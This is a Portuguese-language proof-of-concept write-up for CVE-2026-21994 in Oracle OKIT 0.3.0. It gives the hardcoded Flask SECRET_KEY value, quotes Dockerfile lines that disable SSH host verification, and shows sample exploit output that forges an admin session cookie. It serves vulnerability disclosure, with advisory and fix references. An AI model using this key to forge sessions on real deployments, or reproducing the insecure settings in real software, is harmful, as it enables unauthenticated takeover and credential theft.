
Prova de conceito de exploit para CVE-2026-21994, demonstrando falsificação de sessão de administrador não autenticada por meio de uma SECRET_KEY Flask codificada e bypass de verificação de host SSH no Oracle OKIT.
O Oracle OKIT (oci-designer-toolkit) versão 0.3.0 contém duas configurações incorretas críticas que se encadeiam em uma tomada total não autenticada. Uma SECRET_KEY do Flask codificada e exposta no repositório público permite que qualquer invasor forje um cookie de sessão de administrador válido — sem necessidade de credenciais. Separadamente, a imagem Docker desativa completamente a verificação de host SSH, permitindo que um invasor de rede intercepte chaves de API OCI e chaves privadas durante implantações de infraestrutura.
1. SECRET_KEY codificada — okitclassic/okitserver/config.py:4
SECRET_KEY='8980ffsd675747jjjh'
O Flask usa essa chave para assinar cookies de sessão. Como ela está codificada em um repositório público, um invasor pode forjar um cookie de administrador válido e acessar o painel OKIT sem nenhuma credencial.
2. Verificação de Host SSH Desativada —
Dockerfile:41&& echo ' StrictHostKeyChecking no' >> /etc/ssh/ssh_config \
&& echo ' UserKnownHostsFile=/dev/null' >> /etc/ssh/ssh_config \
O contêiner nunca verifica impressões digitais de host SSH. Um invasor de rede pode fazer MitM em implantações e roubar credenciais OCI.
Execute exploit.py dentro do diretório do repositório clonado:
python3 exploit.py
[*] Scanning okitclassic/okitserver/config.py ...
[!] VULNERABLE — Hardcoded SECRET_KEY found: 8980ffsd675747jjjh
[+] Authentication bypass possible with zero credentials.
[*] Scanning Dockerfile ...
[!] VULNERABLE — SSH host verification is DISABLED.
[+] Network attacker can MitM deployments and steal OCI credentials.
[*] Forging admin session cookie ...
[!] SUCCESS — Forged cookie: .eJwlzj0OgkAQBeC7bG1...
| ID CVE | CVE-2026-21994 |
| Aviso GitHub | GHSA-g6qw-3gmw-m78m |
| CWE | CWE-284 — Controle de Acesso Incorreto |
| Mapeamento de Avisos Oracle | oracle.com/security-alerts/public-vuln-to-advisory-mapping |
| Referência CVE Oracle | oracle.com/security-alerts/all-oracle-cves |
| Correção | oracle/oci-designer-toolkit#780 |
Descoberto e relatado por Gouri Sankar A — g0w6y